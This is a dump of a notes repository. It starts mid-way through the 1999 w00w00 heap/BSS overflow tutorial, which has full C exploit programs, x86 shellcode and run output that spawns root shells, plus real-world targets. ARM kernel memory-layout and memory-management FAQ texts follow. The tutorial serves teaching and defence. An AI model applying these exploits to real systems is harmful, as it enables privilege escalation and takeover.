memset(mainbuf, 0, sizeof(mainbufsize)); 395 | 396 | snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", 397 | buf, VULPROG, VULFILE); 398 | 399 | printf("Overflowing tmpaddr to point to %p, check %s after.\n\n", 400 | addr, VULFILE); 401 | 402 | system(mainbuf); 403 | return 0; 404 | } 405 | 406 | ----------------------------------------------------------------------------- 407 | 408 | Here's what happens when we run it: 409 | [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320 410 | Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after. 411 | 412 | before: tmpfile = /tmp/vulprog.tmp 413 | Enter one line of data to put in /tmp/vulprog.tmp: 414 | after: tmpfile = /vulprog1 415 | 416 | Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are 417 | close: 418 | [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330 419 | Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after. 420 | 421 | before: tmpfile = /tmp/vulprog.tmp 422 | Enter one line of data to put in /tmp/vulprog.tmp: 423 | after: tmpfile = /root/.rhosts 424 | [root /tmp/heap/examples/advanced/vul-pkg1]# 425 | 426 | Got it! The exploit overwrites the buffer that the vulnerable program 427 | uses for gets() input. At the end of its buffer, it places the address 428 | of where we assume argv[1] of the vulnerable program is. That is, we 429 | overwrite everything between the overflowed buffer and the tmpfile 430 | pointer. We ascertained the tmpfile pointer's location in memory by 431 | sending arbitrary lengths of "A"'s until we discovered how many "A"'s it 432 | took to reach the start of tmpfile's address. Also, if you have 433 | source to the vulnerable program, you can also add a "printf()" to print 434 | out the addresses/offsets between the overflowed data and the target data 435 | (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)'). 436 | 437 | (Un)fortunately, the offsets usually change at compile-time (as far as 438 | I know), but we can easily recalculate, guess, or "brute force" the 439 | offsets. 440 | 441 | Note: 442 | Now that we need a valid address (argv[1]'s address), we must reverse 443 | the byte order for little endian systems. Little endian systems use 444 | the least significant byte first (x86 is little endian) so that 445 | 0x12345678 is 0x78563412 in memory. If we were doing this on a big 446 | endian system (such as a sparc) we could drop out the code to reverse 447 | the byte order. On a big endian system (like sparc), we could leave 448 | the addresses alone. 449 | 450 | Further note: 451 | So far none of these examples required an executable heap! As I 452 | briefly mentioned in the "Why Heap/BSS Overflows are Significant" 453 | section, these (with the exception of the address byte order) previous 454 | examples were all system/architecture independent. This is useful in 455 | exploiting heap-based overflows. 456 | 457 | With knowledge of how to overwrite pointers, we're going to show how to 458 | modify function pointers. The downside to exploiting function pointers 459 | (and the others to follow) is that they require an executable heap. 460 | 461 | A function pointer (i.e., "int (*funcptr)(char *str)") allows a 462 | programmer to dynamically modify a function to be called. We can 463 | overwrite a function pointer by overwriting its address, so that when 464 | it's executed, it calls the function we point it to instead. This is 465 | good news because there are several options we have. First, we 466 | can include our own shellcode. We can do one of the following with 467 | shellcode: 468 | 469 | 1. argv[] method: store the shellcode in an argument to the program 470 | (requiring an executable stack) 471 | 472 | 2. heap offset method: offset from the top of the heap to the 473 | estimated address of the target/overflow buffer (requiring an 474 | executable heap) 475 | 476 | Note: There is a greater probability of the heap being executable than 477 | the stack on any given system. Therefore, the heap method will probably 478 | work more often. 479 | 480 | A second method is to simply guess (though it's inefficient) the address 481 | of a function, using an estimated offset of that in the vulnerable 482 | program. Also, if we know the address of system() in our program, it 483 | will be at a very close offset, assuming both vulprog/exploit were 484 | compiled the same way. The advantage is that no executable is required. 485 | 486 | Note: 487 | Another method is to use the PLT (Procedure Linking Table) which shares 488 | the address of a function in the PLT. I first learned the PLT method 489 | from str (stranJer) in a non-executable stack exploit for sparc. 490 | 491 | The reason the second method is the preferred method, is simplicity. 492 | We can guess the offset of system() in the vulprog from the address of 493 | system() in our exploit fairly quickly. This is synonymous on remote 494 | systems (assuming similar versions, operating systems, and 495 | architectures). With the stack method, the advantage is that we can do 496 | whatever we want, and we don't require compatible function pointers 497 | (i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same). 498 | The disadvantage (as mentioned earlier) is that it requires an 499 | executable stack. 500 | 501 | Here is our vulnerable program for the following 2 exploits: 502 | ----------------------------------------------------------------------------- 503 | /* 504 | * Just the vulnerable program we will exploit. 505 | * Compile as: gcc -o vulprog vulprog.c (or change exploit macros) 506 | */ 507 | 508 | #include 509 | #include 510 | #include 511 | #include 512 | 513 | #define ERROR -1 514 | #define BUFSIZE 64 515 | 516 | int goodfunc(const char *str); /* funcptr starts out as this */ 517 | 518 | int main(int argc, char **argv) 519 | { 520 | static char buf[BUFSIZE]; 521 | static int (*funcptr)(const char *str); 522 | 523 | if (argc <= 2) 524 | { 525 | fprintf(stderr, "Usage: %s \n", argv[0]); 526 | exit(ERROR); 527 | } 528 | 529 | printf("(for 1st exploit) system() = %p\n", system); 530 | printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]); 531 | printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf); 532 | 533 | funcptr = (int (*)(const char *str))goodfunc; 534 | printf("before overflow: funcptr points to %p\n", funcptr); 535 | 536 | memset(buf, 0, sizeof(buf)); 537 | strncpy(buf, argv[1], strlen(argv[1])); 538 | printf("after overflow: funcptr points to %p\n", funcptr); 539 | 540 | (void)(*funcptr)(argv[2]); 541 | return 0; 542 | } 543 | 544 | /* ---------------------------------------------- */ 545 | 546 | /* This is what funcptr would point to if we didn't overflow it */ 547 | int goodfunc(const char *str) 548 | { 549 | printf("\nHi, I'm a good function. I was passed: %s\n", str); 550 | return 0; 551 | } 552 | ----------------------------------------------------------------------------- 553 | 554 | Our first example, is the system() method: 555 | ----------------------------------------------------------------------------- 556 | /* 557 | * Copyright (C) January 1999, Matt Conover & WSD 558 | * 559 | * Demonstrates overflowing/manipulating static function pointers in 560 | * the bss (uninitialized data) to execute functions. 561 | * 562 | * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best) 563 | * To compile use: gcc -o exploit1 exploit1.c 564 | */ 565 | 566 | #include 567 | #include 568 | #include 569 | #include 570 | 571 | #define BUFSIZE 64 /* the estimated diff between funcptr/buf */ 572 | 573 | #define VULPROG "./vulprog" /* vulnerable program location */ 574 | #define CMD "/bin/sh" /* command to execute if successful */ 575 | 576 | #define ERROR -1 577 | 578 | int main(int argc, char **argv) 579 | { 580 | register int i; 581 | u_long sysaddr; 582 | static char buf[BUFSIZE + sizeof(u_long) + 1] = {0}; 583 | 584 | if (argc <= 1) 585 | { 586 | fprintf(stderr, "Usage: %s \n", argv[0]); 587 | fprintf(stderr, "[offset = estimated system() offset]\n\n"); 588 | 589 | exit(ERROR); 590 | } 591 | 592 | sysaddr = (u_long)&system - atoi(argv[1]); 593 | printf("trying system() at 0x%lx\n", sysaddr); 594 | 595 | memset(buf, 'A', BUFSIZE); 596 | 597 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 598 | for (i = 0; i < sizeof(sysaddr); i++) 599 | buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; 600 | 601 | execl(VULPROG, VULPROG, buf, CMD, NULL); 602 | return 0; 603 | } 604 | ----------------------------------------------------------------------------- 605 | 606 | When we run this with an offset of 16 (which may vary) we get: 607 | [root /w00w00/heap/examples]# ./exploit1 16 608 | trying system() at 0x80484d0 609 | (for 1st exploit) system() = 0x80484d0 610 | (for 2nd exploit, stack method) argv[2] = 0xbffffd3c 611 | (for 2nd exploit, heap offset method) buf = 0x804a9a8 612 | 613 | before overflow: funcptr points to 0x8048770 614 | after overflow: funcptr points to 0x80484d0 615 | bash# 616 | 617 | And our second example, using both argv[] and heap offset method: 618 | ----------------------------------------------------------------------------- 619 | /* 620 | * Copyright (C) January 1999, Matt Conover & WSD 621 | * 622 | * This demonstrates how to exploit a static buffer to point the 623 | * function pointer at argv[] to execute shellcode. This requires 624 | * an executable heap to succeed. 625 | * 626 | * The exploit takes two argumenst (the offset and "heap"/"stack"). 627 | * For argv[] method, it's an estimated offset to argv[2] from 628 | * the stack top. For the heap offset method, it's an estimated offset 629 | * to the target/overflow buffer from the heap top. 630 | * 631 | * Try values somewhere between 325-345 for argv[] method, and 420-450 632 | * for heap. 633 | * 634 | * To compile use: gcc -o exploit2 exploit2.c 635 | */ 636 | 637 | #include 638 | #include 639 | #include 640 | #include 641 | 642 | #define ERROR -1 643 | #define BUFSIZE 64 /* estimated diff between buf/funcptr */ 644 | 645 | #define VULPROG "./vulprog" /* where the vulprog is */ 646 | 647 | char shellcode[] = /* just aleph1's old shellcode (linux x86) */ 648 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" 649 | "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" 650 | "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 651 | 652 | u_long getesp() 653 | { 654 | __asm__("movl %esp,%eax"); /* set sp as return value */ 655 | } 656 | 657 | int main(int argc, char **argv) 658 | { 659 | register int i; 660 | u_long sysaddr; 661 | char buf[BUFSIZE + sizeof(u_long) + 1]; 662 | 663 | if (argc <= 2) 664 | { 665 | fprintf(stderr, "Usage: %s \n", argv[0]); 666 | exit(ERROR); 667 | } 668 | 669 | if (strncmp(argv[2], "stack", 5) == 0) 670 | { 671 | printf("Using stack for shellcode (requires exec. stack)\n"); 672 | 673 | sysaddr = getesp() + atoi(argv[1]); 674 | printf("Using 0x%lx as our argv[1] address\n\n", sysaddr); 675 | 676 | memset(buf, 'A', BUFSIZE + sizeof(u_long)); 677 | } 678 | 679 | else 680 | { 681 | printf("Using heap buffer for shellcode " 682 | "(requires exec. heap)\n"); 683 | 684 | sysaddr = (u_long)sbrk(0) - atoi(argv[1]); 685 | printf("Using 0x%lx as our buffer's address\n\n", sysaddr); 686 | 687 | if (BUFSIZE + 4 + 1 < strlen(shellcode)) 688 | { 689 | fprintf(stderr, "error: buffer is too small for shellcode " 690 | "(min. = %d bytes)\n", strlen(shellcode)); 691 | 692 | exit(ERROR); 693 | } 694 | 695 | strcpy(buf, shellcode); 696 | memset(buf + strlen(shellcode), 'A', 697 | BUFSIZE - strlen(shellcode) + sizeof(u_long)); 698 | } 699 | 700 | buf[BUFSIZE + sizeof(u_long)] = '\0'; 701 | 702 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 703 | for (i = 0; i < sizeof(sysaddr); i++) 704 | buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; 705 | 706 | execl(VULPROG, VULPROG, buf, shellcode, NULL); 707 | return 0; 708 | } 709 | ----------------------------------------------------------------------------- 710 | 711 | When we run this with an offset of 334 for the argv[] method we get: 712 | [root /w00w00/heap/examples] ./exploit2 334 stack 713 | Using stack for shellcode (requires exec. stack) 714 | Using 0xbffffd16 as our argv[1] address 715 | 716 | (for 1st exploit) system() = 0x80484d0 717 | (for 2nd exploit, stack method) argv[2] = 0xbffffd16 718 | (for 2nd exploit, heap offset method) buf = 0x804a9a8 719 | 720 | before overflow: funcptr points to 0x8048770 721 | after overflow: funcptr points to 0xbffffd16 722 | bash# 723 | 724 | When we run this with an offset of 428-442 for the heap offset method we get: 725 | [root /w00w00/heap/examples] ./exploit2 428 heap 726 | Using heap buffer for shellcode (requires exec. heap) 727 | Using 0x804a9a8 as our buffer's address 728 | 729 | (for 1st exploit) system() = 0x80484d0 730 | (for 2nd exploit, stack method) argv[2] = 0xbffffd16 731 | (for 2nd exploit, heap offset method) buf = 0x804a9a8 732 | 733 | before overflow: funcptr points to 0x8048770 734 | after overflow: funcptr points to 0x804a9a8 735 | bash# 736 | 737 | Note: 738 | Another advantage to the heap method is that you have a large 739 | working range. With argv[] (stack) method, it needed to be exact. With 740 | the heap offset method, any offset between 428-442 worked. 741 | 742 | As you can see, there are several different methods to exploit the same 743 | problem. As an added bonus, we'll include a final type of exploitation 744 | that uses jmp_bufs (setjmp/longjmp). jmp_buf's basically store a stack 745 | frame, and jump to it at a later point in execution. If we get a chance 746 | to overflow a buffer between setjmp() and longjmp(), that's above the 747 | overflowed buffer, this can be exploited. We can set these up to emulate 748 | the behavior of a stack-based overflow (as does the argv[] shellcode 749 | method used earlier, also). Now this is the jmp_buf for an x86 system. 750 | These will needed to be modified for other architectures, accordingly. 751 | 752 | First we will include a vulnerable program again: 753 | ----------------------------------------------------------------------------- 754 | /* 755 | * This is just a basic vulnerable program to demonstrate 756 | * how to overwrite/modify jmp_buf's to modify the course of 757 | * execution. 758 | */ 759 | 760 | #include 761 | #include 762 | #include 763 | #include 764 | #include 765 | 766 | #define ERROR -1 767 | #define BUFSIZE 16 768 | 769 | static char buf[BUFSIZE]; 770 | jmp_buf jmpbuf; 771 | 772 | u_long getesp() 773 | { 774 | __asm__("movl %esp,%eax"); /* the return value goes in %eax */ 775 | } 776 | 777 | int main(int argc, char **argv) 778 | { 779 | if (argc <= 1) 780 | { 781 | fprintf(stderr, "Usage: %s \n"); 782 | exit(ERROR); 783 | } 784 | 785 | printf("[vulprog] argv[2] = %p\n", argv[2]); 786 | printf("[vulprog] sp = 0x%lx\n\n", getesp()); 787 | 788 | if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */ 789 | { 790 | fprintf(stderr, "error: exploit didn't work\n"); 791 | exit(ERROR); 792 | } 793 | 794 | printf("before:\n"); 795 | printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", 796 | jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); 797 | 798 | printf("bp = %p, sp = %p, pc = %p\n\n", 799 | jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); 800 | 801 | strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */ 802 | 803 | printf("after:\n"); 804 | printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", 805 | jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); 806 | 807 | printf("bp = %p, sp = %p, pc = %p\n\n", 808 | jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); 809 | 810 | longjmp(jmpbuf, 1); 811 | return 0; 812 | } 813 | ----------------------------------------------------------------------------- 814 | 815 | The reason we have the vulnerable program output its stack pointer (esp 816 | on x86) is that it makes "guessing" easier for the novice. 817 | 818 | And now the exploit for it (you should be able to follow it): 819 | ----------------------------------------------------------------------------- 820 | /* 821 | * Copyright (C) January 1999, Matt Conover & WSD 822 | * 823 | * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp) 824 | * to emulate a stack-based overflow in the heap. By that I mean, 825 | * you would overflow the sp/pc of the jmpbuf. When longjmp() is 826 | * called, it will execute the next instruction at that address. 827 | * Therefore, we can stick shellcode at this address (as the data/heap 828 | * section on most systems is executable), and it will be executed. 829 | * 830 | * This takes two arguments (offsets): 831 | * arg 1 - stack offset (should be about 25-45). 832 | * arg 2 - argv offset (should be about 310-330). 833 | */ 834 | 835 | #include 836 | #include 837 | #include 838 | #include 839 | 840 | #define ERROR -1 841 | #define BUFSIZE 16 842 | 843 | #define VULPROG "./vulprog4" 844 | 845 | char shellcode[] = /* just aleph1's old shellcode (linux x86) */ 846 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" 847 | "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" 848 | "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; 849 | 850 | u_long getesp() 851 | { 852 | __asm__("movl %esp,%eax"); /* the return value goes in %eax */ 853 | } 854 | 855 | int main(int argc, char **argv) 856 | { 857 | int stackaddr, argvaddr; 858 | register int index, i, j; 859 | 860 | char buf[BUFSIZE + 24 + 1]; 861 | 862 | if (argc <= 1) 863 | { 864 | fprintf(stderr, "Usage: %s \n", 865 | argv[0]); 866 | 867 | fprintf(stderr, "[stack offset = offset to stack of vulprog\n"); 868 | fprintf(stderr, "[argv offset = offset to argv[2]]\n"); 869 | 870 | exit(ERROR); 871 | } 872 | 873 | stackaddr = getesp() - atoi(argv[1]); 874 | argvaddr = getesp() + atoi(argv[2]); 875 | 876 | printf("trying address 0x%lx for argv[2]\n", argvaddr); 877 | printf("trying address 0x%lx for sp\n\n", stackaddr); 878 | 879 | /* 880 | * The second memset() is needed, because otherwise some values 881 | * will be (null) and the longjmp() won't do our shellcode. 882 | */ 883 | 884 | memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12); 885 | buf[BUFSIZE+24] = '\0'; 886 | 887 | /* ------------------------------------- */ 888 | 889 | /* 890 | * We need the stack pointer, because to set pc to our shellcode 891 | * address, we have to overwrite the stack pointer for jmpbuf. 892 | * Therefore, we'll rewrite it with the real address again. 893 | */ 894 | 895 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 896 | for (i = 0; i < sizeof(u_long); i++) /* setup BP */ 897 | { 898 | index = BUFSIZE + 16 + i; 899 | buf[index] = (stackaddr >> (i * 8)) & 255; 900 | } 901 | 902 | /* ----------------------------- */ 903 | 904 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 905 | for (i = 0; i < sizeof(u_long); i++) /* setup SP */ 906 | { 907 | index = BUFSIZE + 20 + i; 908 | buf[index] = (stackaddr >> (i * 8)) & 255; 909 | } 910 | 911 | /* ----------------------------- */ 912 | 913 | /* reverse byte order (on a little endian system) (ntohl equiv) */ 914 | for (i = 0; i < sizeof(u_long); i++) /* setup PC */ 915 | { 916 | index = BUFSIZE + 24 + i; 917 | buf[index] = (argvaddr >> (i * 8)) & 255; 918 | } 919 | 920 | execl(VULPROG, VULPROG, buf, shellcode, NULL); 921 | return 0; 922 | } 923 | ----------------------------------------------------------------------------- 924 | 925 | Ouch, that was sloppy. But anyway, when we run this with a stack offset 926 | of 36 and a argv[2] offset of 322, we get the following: 927 | [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322 928 | trying address 0xbffffcf6 for argv[2] 929 | trying address 0xbffffb90 for sp 930 | 931 | [vulprog] argv[2] = 0xbffffcf6 932 | [vulprog] sp = 0xbffffb90 933 | 934 | before: 935 | bx = 0x0, si = 0x40001fb0, di = 0x4000000f 936 | bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715 937 | 938 | after: 939 | bx = 0x1010101, si = 0x1010101, di = 0x1010101 940 | bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6 941 | 942 | bash# 943 | 944 | w00w00! For those of you that are saying, "Okay. I see this works in a 945 | controlled environment; but what about in the wild?" There is sensitive 946 | data on the heap that can be overflowed. Examples include: 947 | functions reason 948 | 1. *gets()/*printf(), *scanf() __iob (FILE) structure in heap 949 | 2. popen() __iob (FILE) structure in heap 950 | 3. *dir() (readdir, seekdir, ...) DIR entries (dir/heap buffers) 951 | 4. atexit() static/global function pointers 952 | 5. strdup() allocates dynamic data in the heap 953 | 7. getenv() stored data on heap 954 | 8. tmpnam() stored data on heap 955 | 9. malloc() chain pointers 956 | 10. rpc callback functions function pointers 957 | 11. windows callback functions func pointers kept on heap 958 | 12. signal handler pointers function pointers (note: unix tracks 959 | in cygnus (gcc for win), these in the kernel, not in the heap) 960 | 961 | Now, you can definitely see some uses these functions. Room allocated 962 | for FILE structures in functions such as printf()'s, fget()'s, 963 | readdir()'s, seekdir()'s, etc. can be manipulated (buffer or function 964 | pointers). atexit() has function pointers that will be called when the 965 | program terminates. strdup() can store strings (such as filenames or 966 | passwords) on the heap. malloc()'s own chain pointers (inside its pool) 967 | can be manipulated to access memory it wasn't meant to be. getenv() 968 | stores data on the heap, which would allow us modify something such as 969 | $HOME after it's initially checked. svc/rpc registration functions 970 | (librpc, libnsl, etc.) keep callback functions stored on the heap. 971 | 972 | Once you know how to overwrite FILE sturctures with popen(), you can 973 | quickly figure out how to do it with other functions (i.e., *printf, 974 | *gets, *scanf, etc.), as well as DIR structures (because they are 975 | similar. 976 | 977 | Two "real world" vulnerabilities are Solaris' tip and BSDI's crontab. 978 | The BSDI crontab vulnerability was discovered by mudge of L0pht (see 979 | L0pht 1996 Advisory Page). 980 | 981 | Our first case study will be the BSDI crontab heap-based overflow. 982 | Passing a long filename will overflow a static buffer. Above that buffer 983 | in memory, we have a pwd (see pwd.h) structure! This stores a user name, 984 | password, uid, gid, etc. By overwriting the uid/gid field of the pwd, we 985 | can modify the privileges that crond will run our crontab with (as soon as 986 | it tries to run our crontab). This script could then put out a suid root 987 | shell, because our script will be running with uid/gid 0. 988 | 989 | Our second case study is 'tip' on Solaris. It runs suid uucp. It is 990 | possible to get root once uucp privileges are gained (but, that's outside 991 | the scope of this article). Tip will overflow a static buffer when 992 | prompting for a file to send/receive. Above the static buffer in memory is 993 | a jmp_buf. By overwriting the static buffer and then causing a SIGINT, 994 | we can get shellcode executed (by storing it in argv[]). To exploit 995 | successfully, we need to either connect to a valid system, or create a 996 | "fake device" with which tip will connect to. 997 | 998 | Possible Fixes (Workarounds) 999 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1000 | Obviously, the best prevention for heap-based overflows is writing good 1001 | code! Similar to stack-based overflows, there is no real way of 1002 | preventing heap-based overflows. 1003 | 1004 | We can get a copy of the bounds checking gcc/egcs (which should locate 1005 | most potential heap-based overflows) developed by Richard Jones and Paul 1006 | Kelly. This program can be downloaded from Richard Jone's homepage 1007 | at http://www.annexia.demon.co.uk. It detects overruns that might be 1008 | missed by human error. One example they use is: "int array[10]; for (i = 1009 | 0; i <= 10; i++) array[i] = 1". I have never used it. 1010 | 1011 | Note: 1012 | For Windows, one could use NuMega's bounds checker which essentially 1013 | performs the same as the bounds checking gcc. 1014 | 1015 | We can always make a non-executable heap patch (as mentioned early, most 1016 | systems have an executable heap). During a conversation I had with Solar 1017 | Designer, he mentioned the main problems with a non-executable would 1018 | involve compilers, interpreters, etc. 1019 | 1020 | Note: 1021 | I added a note section here to reiterate the point a non-executable 1022 | heap does NOT prevent heap overflows at all. It means we can't execute 1023 | instructions in the heap. It does NOT prevent us from overwriting data 1024 | in the heap. 1025 | 1026 | Likewise, another possibility is to make a "HeapGuard", which would be 1027 | the equivalent to Cowan's StackGuard mentioned earlier. He (et. al.) 1028 | also developed something called "MemGuard", but it's a misnomer. 1029 | Its function is to prevent a return address (on the stack) from being 1030 | overwritten (via canary values) on the stack. It does nothing to prevent 1031 | overflows in the heap or bss. 1032 | 1033 | 1034 | Acknowledgements 1035 | ~~~~~~~~~~~~~~~~ 1036 | There has been a significant amount of work on heap-based overflows in 1037 | the past. We ought to name some other people who have published work 1038 | involving heap/bss-based overflows (though, our work wasn't based off 1039 | them). 1040 | 1041 | Solar Designer: SuperProbe exploit (function pointers), color_xterm 1042 | exploit (struct pointers), WebSite (pointer arrays), etc. 1043 | 1044 | L0pht: Internet Explorer 4.01 vulnerablity (dildog), BSDI crontab 1045 | exploit (mudge), etc. 1046 | 1047 | Some others who have published exploits for heap-based overflows (thanks 1048 | to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam 1049 | Morrison (stdioflow). I'm sure there are many others, and I apologize for 1050 | excluding anyone. 1051 | 1052 | I'd also like to thank the following people who had some direct 1053 | involvement in this article: str (stranJer), halflife, and jobe. 1054 | Indirect involvements: Solar Designer, mudge, and other w00w00 1055 | affiliates. 1056 | 1057 | Other good sources of info include: as/gcc/ld info files (/usr/info/*), 1058 | BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00 1059 | (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc. 1060 | -------------------------------------------------------------------------------- /memory.txt: -------------------------------------------------------------------------------- 1 | Kernel Memory Layout on ARM Linux 2 | 3 | Russell King 4 | November 17, 2005 (2.6.15) 5 | 6 | This document describes the virtual memory layout which the Linux 7 | kernel uses for ARM processors. It indicates which regions are 8 | free for platforms to use, and which are used by generic code. 9 | 10 | The ARM CPU is capable of addressing a maximum of 4GB virtual memory 11 | space, and this must be shared between user space processes, the 12 | kernel, and hardware devices. 13 | 14 | As the ARM architecture matures, it becomes necessary to reserve 15 | certain regions of VM space for use for new facilities; therefore 16 | this document may reserve more VM space over time. 17 | 18 | Start End Use 19 | -------------------------------------------------------------------------- 20 | ffff8000 ffffffff copy_user_page / clear_user_page use. 21 | For SA11xx and Xscale, this is used to 22 | setup a minicache mapping. 23 | 24 | ffff1000 ffff7fff Reserved. 25 | Platforms must not use this address range. 26 | 27 | ffff0000 ffff0fff CPU vector page. 28 | The CPU vectors are mapped here if the 29 | CPU supports vector relocation (control 30 | register V bit.) 31 | 32 | ffc00000 fffeffff DMA memory mapping region. Memory returned 33 | by the dma_alloc_xxx functions will be 34 | dynamically mapped here. 35 | 36 | ff000000 ffbfffff Reserved for future expansion of DMA 37 | mapping region. 38 | 39 | VMALLOC_END feffffff Free for platform use, recommended. 40 | VMALLOC_END must be aligned to a 2MB 41 | boundary. 42 | 43 | VMALLOC_START VMALLOC_END-1 vmalloc() / ioremap() space. 44 | Memory returned by vmalloc/ioremap will 45 | be dynamically placed in this region. 46 | VMALLOC_START may be based upon the value 47 | of the high_memory variable. 48 | 49 | PAGE_OFFSET high_memory-1 Kernel direct-mapped RAM region. 50 | This maps the platforms RAM, and typically 51 | maps all platform RAM in a 1:1 relationship. 52 | 53 | TASK_SIZE PAGE_OFFSET-1 Kernel module space 54 | Kernel modules inserted via insmod are 55 | placed here using dynamic mappings. 56 | 57 | 00001000 TASK_SIZE-1 User space mappings 58 | Per-thread mappings are placed here via 59 | the mmap() system call. 60 | 61 | 00000000 00000fff CPU vector page / null pointer trap 62 | CPUs which do not support vector remapping 63 | place their vector page here. NULL pointer 64 | dereferences by both the kernel and user 65 | space are also caught via this mapping. 66 | 67 | Please note that mappings which collide with the above areas may result 68 | in a non-bootable kernel, or may cause the kernel to (eventually) panic 69 | at run time. 70 | 71 | Since future CPUs may impact the kernel mapping layout, user programs 72 | must not access any memory which is not mapped inside their 0x0001000 73 | to TASK_SIZE address range. If they wish to access these areas, they 74 | must set up their own mappings using open() and mmap(). 75 | -------------------------------------------------------------------------------- /memorylayout.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Malformation/Notes/73e7b03526bb37f5b484c0bc6cd03caab8d1eb20/memorylayout.txt -------------------------------------------------------------------------------- /memorymanagement.txt: -------------------------------------------------------------------------------- 1 | 2 | Memory Management Reference 3 | Frequently Asked Questions 4 | 5 | Contents | News | Glossary | FAQ | Articles | Bibliography | Links | 6 | Feedback 7 | _________________________________________________________________ 8 | 9 | This is a list of questions that represent the problems people often 10 | have with memory management. Some answers appear below, with links to 11 | helpful supporting material, such as the glossary, the bibliography, 12 | and external sites. For a full explanation of any terms used, see the 13 | glossary. 14 | 15 | C-specific questions 16 | 17 | + Can I use garbage collection in C? 18 | + Why do I need to test the return value from malloc? Surely it 19 | always succeeds? 20 | + What's the point of having a garbage collector? Why not use 21 | malloc and free? 22 | + What's wrong with ANSI malloc in the C library? 23 | 24 | C++-specific questions 25 | 26 | + Can I use garbage collection in C++? 27 | + Why is delete so slow? 28 | + What happens if you use class libraries that leak memory? 29 | + Can't I get all the benefits of garbage collection using C++ 30 | constructors and destructors? 31 | 32 | Common objections to garbage collection 33 | 34 | + What languages use garbage collection? 35 | + What's the advantage of garbage collection? 36 | + Programs with GC are huge and bloated; GC isn't suitable for 37 | small programs or systems. 38 | + I can't use GC because I can't afford to have my program 39 | pause 40 | + Isn't it much cheaper to use reference counts rather than 41 | garbage collection? 42 | + Isn't garbage collection unreliable? I've heard that GCs 43 | often kill the program. 44 | + I've heard that GC uses twice as much memory. 45 | + Doesn't garbage collection make programs slow? 46 | + Manual memory management gives me control -- it doesn't 47 | pause. 48 | 49 | Miscellaneous 50 | 51 | + Why does my disk rattle so much? 52 | + Where can I find out more about garbage collection? 53 | + Where can I get a garbage collector? 54 | + Why does my program use so much memory? 55 | + I use a library, and my program grows every time I call it. 56 | Why? 57 | + Should I write my own memory allocator to make my program 58 | fast? 59 | + Why can't I just use local data on the stack or in global 60 | variables? 61 | + Why should I worry about virtual memory? Can't I just use as 62 | much memory as I want? 63 | + Why do I need to reset my X server every week? 64 | 65 | C-specific questions 66 | 67 | Can I use garbage collection in C? 68 | 69 | Yes. Various conservative garbage collectors for C exist as add-on 70 | libraries. 71 | 72 | Related terms: C; conservative garbage collection 73 | 74 | Useful websites: 75 | * Boehm-Weiser collector 76 | 77 | 78 | Why do I need to test the return value from malloc? Surely it always 79 | succeeds? 80 | 81 | For small programs, and during light testing, it is true that malloc 82 | usually succeeds. Unfortunately, there are all sorts of unpredictable 83 | reasons why malloc might fail one day; for example: 84 | * Someone uses your program for a far larger data set than you 85 | anticipated; 86 | * Your program is running on a machine with less memory than you 87 | expected; 88 | * The machine your program is running on is heavily loaded. 89 | 90 | In this case, malloc will return NULL, and your program will attempt 91 | to store data by resolving the null pointer. This might cause your 92 | program to exit immediately with a helpful message, but it is more 93 | likely to provoke mysterious problems later on. 94 | 95 | If you want your code to be robust, and to stand the test of time, you 96 | must check all error or status codes that may be returned by functions 97 | you call, especially those in other libraries, such as the C run-time 98 | library. 99 | 100 | If you really don't want to check the return value from malloc, and 101 | you don't want your program to behave mysteriously when out of memory, 102 | wrap malloc up in something like this: 103 | #include 104 | #include 105 | 106 | void *my_malloc(size_t size) 107 | { 108 | void *p = malloc(size); 109 | 110 | if(p == NULL) { 111 | fputs("Out of memory.\n", stderr); 112 | exit(EXIT_FAILURE); 113 | } 114 | 115 | return p; 116 | } 117 | 118 | Undefined behavior is worth eliminating even in small programs. 119 | 120 | Related terms: malloc 121 | 122 | What's the point of having a garbage collector? Why not use malloc and free? 123 | 124 | Manual memory management, such as malloc and free, forces the 125 | programmer to keep track of which memory is still required, and who is 126 | responsible for freeing it. This works for small programs without 127 | internal interfaces, but becomes a rich source of 